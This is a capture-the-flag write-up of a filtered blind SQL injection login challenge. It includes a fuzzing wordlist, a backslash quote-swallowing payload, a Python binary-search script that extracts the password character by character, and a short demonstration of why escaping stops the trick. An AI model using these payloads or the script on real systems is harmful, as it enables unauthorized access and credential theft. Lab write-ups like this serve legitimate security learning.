Back to grinding SQL injection challenges, starting with this easy injection.
At first I could not find any hint at all... only after reading a write-up did I notice there is a hint.txt.
With the backend statement available the payload is easier to build, but there is filtering as well, so it has to be probed with fuzzing.
It turns out select and also ' " are filtered; luckily the space and the backslash are not....
fuzz.txt (add your own entries as needed)
select
from
ascii
substr
table
column
by
schema
where
extractvalue
exp
if
/
(
)
%
!
@
#
$
^
&
*
-
_
+
=
'
"
~
`
\
|
,
.
||
&&
order
updatexml
limit
And
Or
%23
%20
space
<
>
regex
group_concat
table_name
table_schema
column_name
database
information
union select
ascii(substr())
(select(group_concat(table_name))
from(information_schema.tables)where(table_schema=database())
(ascii(substr((select(group_concat(flaaag))from(flag)),%s,1))=%s)
where(table_schema=database())
Learning a neat trick here, and trying it out in a local environment.
With username = admin\ the single quote ' is swallowed, and the rest of the statement can be built after it.
The column name is also given, so it can be brute-forced directly; since select cannot be used, this becomes blind injection.
If the condition holds, the response contains stronger (not sure why the echo is sometimes odd, but running the script works fine).
payload:
username=admin\ password=or (ascii(substr(password,1,1))>0)#
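The backslash trick above, as an added example that is not from the write-up: a tiny MySQL-style string-literal scanner (assumed query template, hypothetical helper names) that shows how admin\ consumes the closing quote so the password value becomes bare SQL, and how escaping the backslash the way a proper connector does keeps both values inside their literals.

```python
# Added example, not the write-up's code: a MySQL-style literal scanner showing
# how username admin\ swallows the quote and why escaping/binding prevents it.

def split_literals(sql):
    """Split MySQL text into ('sql', ..)/('str', ..)/('comment', ..) chunks.
    Inside a literal a backslash escapes the next char; '#' starts a comment."""
    chunks, buf, i, n = [], '', 0, len(sql)
    while i < n:
        c = sql[i]
        if c == '#':                     # '#' comment runs to end of line
            chunks += [('sql', buf)] if buf else []
            chunks.append(('comment', sql[i:]))
            return chunks
        if c != "'":
            buf, i = buf + c, i + 1
            continue
        chunks += [('sql', buf)] if buf else []
        buf, lit, i = '', '', i + 1     # consume the opening quote
        while i < n and sql[i] != "'":
            if sql[i] == '\\' and i + 1 < n:   # \' stays inside the literal
                lit, i = lit + sql[i + 1], i + 2
            else:
                lit, i = lit + sql[i], i + 1
        if i >= n:                       # no closing quote: MySQL syntax error
            chunks.append(('unterminated', lit))
            return chunks
        chunks.append(('str', lit))
        i += 1                           # consume the closing quote
    if buf:
        chunks.append(('sql', buf))
    return chunks

# Assumed backend pattern: raw concatenation into the quoted literals.
TEMPLATE = "SELECT * FROM users WHERE username='%s' AND password='%s'"

def build_naive(username, password):
    return TEMPLATE % (username, password)

def escape(s):
    """Quote the way a MySQL connector's escaping does: backslash first."""
    return s.replace('\\', '\\\\').replace("'", "\\'")

def build_escaped(username, password):
    return TEMPLATE % (escape(username), escape(password))

if __name__ == '__main__':
    for q in (build_naive("admin\\", "or 1>0 #"), build_escaped("admin\\", "or 1>0 #")):
        print(split_literals(q))
```

In the naive query the first literal ends up as admin' AND password= and the password text is parsed as SQL; in the escaped query every user-supplied byte stays inside a literal, which is also what bound parameters guarantee.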
On to the script. Since = is filtered too, only > can be used, so no character-by-character enumeration; binary search only:
I used the Burp plugin to generate the request headers; installing it speeds up writing scripts.
```python
import requests

session = requests.Session()
URL = "http://8e55b398-4968-43ec-93fc-e0700c8f676d.node3.buuoj.cn/index.php"
# request headers generated by the Burp plugin
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
           "Upgrade-Insecure-Requests": "1",
           "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
           "Referer": URL,
           "Connection": "close", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
           "Accept-Encoding": "gzip, deflate", "DNT": "1", "Content-Type": "application/x-www-form-urlencoded"}


def name():
    result = ''
    for j in range(20):                       # one character per iteration
        begin = 32                            # printable ASCII range
        end = 128
        tmp = (begin + end) // 2
        while begin < end:                    # binary search: '=' is filtered, only '>' is usable
            paramsPost = {"password": "", "username": "admin\\"}   # admin\ swallows the closing quote
            paramsPost['password'] = "or ascii(substr((password),{},1))>{} #".format(j + 1, tmp)
            print(paramsPost)
            response = session.post(URL, data=paramsPost, headers=headers)
            if 'stronger' in response.text:   # condition true: the character is above tmp
                begin = tmp + 1
            else:                             # condition false: the character is at most tmp
                end = tmp
            tmp = (begin + end) // 2
        result += chr(tmp)                    # begin == end == tmp is the character found
        print(result)


name()
```
Password obtained:
Log in with it: